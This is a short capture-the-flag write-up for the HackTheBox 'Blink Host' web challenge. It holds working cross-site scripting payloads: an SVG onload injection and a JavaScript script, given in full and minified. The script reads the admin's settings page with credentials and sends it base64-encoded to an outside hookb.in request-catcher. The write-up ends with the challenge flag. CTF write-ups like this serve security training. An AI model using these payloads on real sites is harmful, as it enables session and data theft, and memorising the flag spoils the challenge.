# Blink Host

## CHALLENGE INFO

You've been tasked with a pentesting engagement on a live website hosting platform. They've asked you to find a way to disclose sensitive information. The website is regularly used by the customers so make sure you don't disrupt their service!

## Challange download and instructions

[web_blink_host.zip](web_blink_host.zip)

To run challange you need some linux with docker

- unzip file
- run ./build-docker.sh

## Solve

Working prototype in ticket submit form:

<details>
<summary>Click this to collapse/fold.</summary>

```html
<svg/onload=\"var xhr=new XMLHttpRequest(); xhr.open('GET', 'https://hookb.in/OeN3BlO1qMcqOdYYOOYQ', true);xhr.send();\">
```

</details>

Working javascript payload for getting settings page with flag:

<details>
<summary>Click this to collapse/fold.</summary>

```javascript
var xhr  = new XMLHttpRequest();
xhr.onreadystatechange = function() {
	if (xhr.readyState == XMLHttpRequest.DONE) {
		var xhrr  = new XMLHttpRequest();
		xhrr.open('GET', 'https://hookb.in/OeN3BlO1qMcqOdYYOOYQ' + '?' + encodeURI(btoa(xhr.responseText)));
		xhrr.send();
	}
}
xhr.open('GET', 'http://127.0.0.1:1337/settings');
xhr.withCredentials = true;
xhr.send();
```

minified version of payload:

```javascript
var xhr=new XMLHttpRequest;xhr.onreadystatechange=function(){if(xhr.readyState==XMLHttpRequest.DONE){var e=new XMLHttpRequest;e.open('GET','https://hookb.in/OeN3BlO1qMcqOdYYOOYQ?'+encodeURI(btoa(xhr.responseText))),e.send()}},xhr.open('GET','http://127.0.0.1:1337/settings'),xhr.withCredentials=!0,xhr.send();
```

</details>

## Flag

HTB{bl1nk_bl1nk_bl1nd_bl1nd}
